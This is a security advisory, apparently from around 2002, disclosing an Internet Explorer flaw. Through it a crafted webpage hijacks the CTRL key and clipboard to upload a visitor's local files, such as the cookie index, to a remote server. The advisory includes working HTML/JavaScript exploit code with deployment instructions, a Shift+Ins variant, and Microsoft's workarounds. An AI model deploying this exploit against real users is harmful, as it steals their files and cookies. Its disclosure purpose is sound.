COMMAND

	IE may have remote web site  upload  any  of  your  file  when  pressing
	control keys

SYSTEMS AFFECTED

	IE with javascript enabled

PROBLEM

	Thanks to :
	

	                                                   _     _

	                                                 o' ,=./ `o

	Andreas Sandblad [sandblad@acc.umu.se]              (o o)        advisory [#8]

	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	

	

	A special crafted webpage can  retrieve  any  local  file  using  simple
	javascript. This is possible by performing the following steps:
	

	1. When an user presses the CTRL key an onkeydown event can  be  set  to
	fire. In the event function the key  pressed  is  changed  to  'V'.  The
	result will be a paste operation with less restrictions.
	

	2. The content of the clipboard is altered and focus  is  changed  to  a
	hidden file upload form. The paste operation will be performed into  the
	form, yielding a  change  of  value  for  the  file  upload  field  (not
	normally allowed).
	

	3.  The  upload  form  is   submited   automaticly   (legal   javascript
	operation).
	

	It isn't necessary to know the exact path to local  files  because  it's
	possible to refer to a file with "..filename".
	

	Further on, if the local  file  "..LOCALS~1TEMPOR~1CONTENT.IE5index.dat"
	is uploaded, then the random directories needed to get  the  exact  path
	to the temporarily internet folders can be retrieved. Knowing the  exact
	path a  compiled  help  file  .chm  can  be  dumped  and  launched  with
	showHelp() (old .chm attack). The compiled help file is allowed to  have
	instructions to execute arbitrary programs.
	

	

	EXPLOIT:
	

	 Instructions

	 ============

	

	Put the html code in a remote html document and load  it  with  Internet
	Explorer. Activate the exploit by pressing  CTRL.  You  must  prepare  a
	server side script to take care of the  upload  process  ("upload.php").
	If      you      choose      to      use      php      I       recommend
	http://www.php.net/manual/en/features.file-upload.php as a reference  on
	how to setup a server side script taking care of a file upload.
	

	 Note

	 ====

	

	1. Please remove all "!" characters in the exploit code. They have been

	inserted to decrease false virus alarms triggered by this mail.

	2. Default settings are assumed.

	

	 Exploit

	 =======

	

	-------------------------- CUT HERE -------------------------------

	<!div id=h style="zoom:0.0001">

	<!form name=u enctype="multipart/form-data" method=post action=upload.php>

	<!input type=file name=file></form></div>

	<!script>

	//uploadFile="..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat";

	uploadFile="..\Cookies\index.dat";

	function gotKey(){

	  if (!event.ctrlKey) return;

	  document.onkeydown = null;

	  event.keyCode = 86;

	  window.clipboardData.setData("Text",uploadFile);

	  (p=document.forms.u.file).focus();

	  p.onpropertychange = function(){document.forms.u.submit()};

	} document.onkeydown = gotKey;

	window.onload=function(){document.body.focus()};

	<!/script>

	-------------------------- CUT HERE -------------------------------

	

	

	

	 Update (25 July 2002)

	 ======

	

	Thor Larholm of PivX Solutions, LLC [http://www.PivX.com] adds :
	

	Of course, this also works with  key  combinations  such  as  Shift+Ins,
	just change event.ctrlKey to event.shiftKey and 86 to 45 :)

SOLUTION

	Microsoft proposed the following possible workarounds:
	

	 1. disable or set to prompt - "Submit nonencrypted form data" option

	 2. disable "allow paste operations via script" (best)

	 3. disable active scripting